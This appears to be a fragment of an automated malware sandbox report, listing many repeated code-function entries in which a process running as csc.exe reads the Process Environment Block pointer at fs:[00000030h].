Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A33749 mov eax, dword ptr fs:[00000030h]	6_2_05A33749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h]	6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05964690 mov eax, dword ptr fs:[00000030h]	6_2_05964690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05964690 mov eax, dword ptr fs:[00000030h]	6_2_05964690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h]	6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h]	6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059966B0 mov eax, dword ptr fs:[00000030h]	6_2_059966B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D6AA mov eax, dword ptr fs:[00000030h]	6_2_0595D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D6AA mov eax, dword ptr fs:[00000030h]	6_2_0595D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0599C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1D6F0 mov eax, dword ptr fs:[00000030h]	6_2_05A1D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h]	6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059916CF mov eax, dword ptr fs:[00000030h]	6_2_059916CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F6C7 mov eax, dword ptr fs:[00000030h]	6_2_05A1F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h]	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E06F1 mov eax, dword ptr fs:[00000030h]	6_2_059E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E06F1 mov eax, dword ptr fs:[00000030h]	6_2_059E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h]	6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h]	6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059936EF mov eax, dword ptr fs:[00000030h]	6_2_059936EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0598D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D6E0 mov eax, dword ptr fs:[00000030h]	6_2_0598D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963616 mov eax, dword ptr fs:[00000030h]	6_2_05963616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963616 mov eax, dword ptr fs:[00000030h]	6_2_05963616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2619 mov eax, dword ptr fs:[00000030h]	6_2_059A2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE609 mov eax, dword ptr fs:[00000030h]	6_2_059DE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35636 mov eax, dword ptr fs:[00000030h]	6_2_05A35636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F603 mov eax, dword ptr fs:[00000030h]	6_2_0599F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h]	6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05991607 mov eax, dword ptr fs:[00000030h]	6_2_05991607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E627 mov eax, dword ptr fs:[00000030h]	6_2_0597E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h]	6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05996620 mov eax, dword ptr fs:[00000030h]	6_2_05996620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998620 mov eax, dword ptr fs:[00000030h]	6_2_05998620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596262C mov eax, dword ptr fs:[00000030h]	6_2_0596262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2866E mov eax, dword ptr fs:[00000030h]	6_2_05A2866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2866E mov eax, dword ptr fs:[00000030h]	6_2_05A2866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597C640 mov eax, dword ptr fs:[00000030h]	6_2_0597C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05992674 mov eax, dword ptr fs:[00000030h]	6_2_05992674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A660 mov eax, dword ptr fs:[00000030h]	6_2_0599A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A660 mov eax, dword ptr fs:[00000030h]	6_2_0599A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05999660 mov eax, dword ptr fs:[00000030h]	6_2_05999660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05999660 mov eax, dword ptr fs:[00000030h]	6_2_05999660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD660 mov eax, dword ptr fs:[00000030h]	6_2_059FD660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h]	6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h]	6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B7190 mov eax, dword ptr fs:[00000030h]	6_2_059B7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A0185 mov eax, dword ptr fs:[00000030h]	6_2_059A0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597B1B0 mov eax, dword ptr fs:[00000030h]	6_2_0597B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h]	6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h]	6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A361E5 mov eax, dword ptr fs:[00000030h]	6_2_05A361E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D1D0 mov eax, dword ptr fs:[00000030h]	6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D1D0 mov ecx, dword ptr fs:[00000030h]	6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A071F9 mov esi, dword ptr fs:[00000030h]	6_2_05A071F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h]	6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h]	6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059901F8 mov eax, dword ptr fs:[00000030h]	6_2_059901F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A351CB mov eax, dword ptr fs:[00000030h]	6_2_05A351CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059651ED mov eax, dword ptr fs:[00000030h]	6_2_059651ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h]	6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h]	6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A20115 mov eax, dword ptr fs:[00000030h]	6_2_05A20115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov ecx, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990124 mov eax, dword ptr fs:[00000030h]	6_2_05990124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h]	6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h]	6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C156 mov eax, dword ptr fs:[00000030h]	6_2_0595C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05967152 mov eax, dword ptr fs:[00000030h]	6_2_05967152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F8158 mov eax, dword ptr fs:[00000030h]	6_2_059F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov ecx, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F9179 mov eax, dword ptr fs:[00000030h]	6_2_059F9179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35152 mov eax, dword ptr fs:[00000030h]	6_2_05A35152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965096 mov eax, dword ptr fs:[00000030h]	6_2_05965096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599909C mov eax, dword ptr fs:[00000030h]	6_2_0599909C
